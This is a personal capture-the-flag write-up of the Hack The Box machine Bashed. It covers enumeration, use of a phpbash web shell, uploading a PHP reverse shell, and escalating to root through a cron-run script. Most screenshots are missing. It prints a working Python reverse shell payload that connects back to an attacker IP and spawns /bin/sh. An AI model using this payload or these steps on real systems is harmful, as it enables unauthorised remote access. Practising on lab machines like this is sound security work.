This is my write-up for the machine Bashed on Hack The Box located at: https://app.hackthebox.com/machines/Bashed.

basic nmap scan: nmap 10.10.10.68

We can see that port 80 (http) is open. I did a deeper nmap scan as well:

The port open is still the same. Going to the http site, we see the following:

I got a hint from this that phpbash is being used on the server and that I will have to exploit it. I ran gobuster to see what directories were available:

The uploads directory was empty, and I believe we will have to upload a shell there. The php directory had the following:

The file was empty when downloaded. Looking in the dev folder, I was able to find the shell:

I was then able to find the user.txt flag:

Running sudo -l, I was able to see the following:

I then realized I would have to upload a reverse shell to the system. There were two ways in my mind: netcat and pentestmonkey php-reverse-shell. I tried the pentestmonkey option first. I downloaded it from here, and then edited the IP address to be mine and then was able to upload it using python3 -m http.server.

I then accessed the file on the website and was able to get a reverse shell using netcat:

After a while of searching for a way to get out of a limited shell, I found this site, where I saw the following:

Running that command got me out of the limited shell:

The sudo -l command from before shows us that the user we currently are has access to run commands as scriptmanager. A quick Google search showed me that to run a command as another user is to run sudo -u scriptmanager. I wanted to get a reverse shell as the scriptmanager user:

I edited the payload from this website:

I get the same error as before:

When I ran linpeas (not shown in write-up, but uploaded the same way as the reverse shell), I noticed that there was a folder called scripts:

The code writes text to a file. At this point, I was actually lost. I found this write-up that clarifies that I should have been focused on the cron jobs and noticed that the file is ran by root in the cron job. I changed the original test.txt file by overwriting it by doing the following:

The content of the file was the following (from the write-up mentioned before):

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.11",8888));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

I was then able to get root (after a minute) and the root flag:

Going back to see where my mistake was, I should have noticed this in the output of linpeas.sh: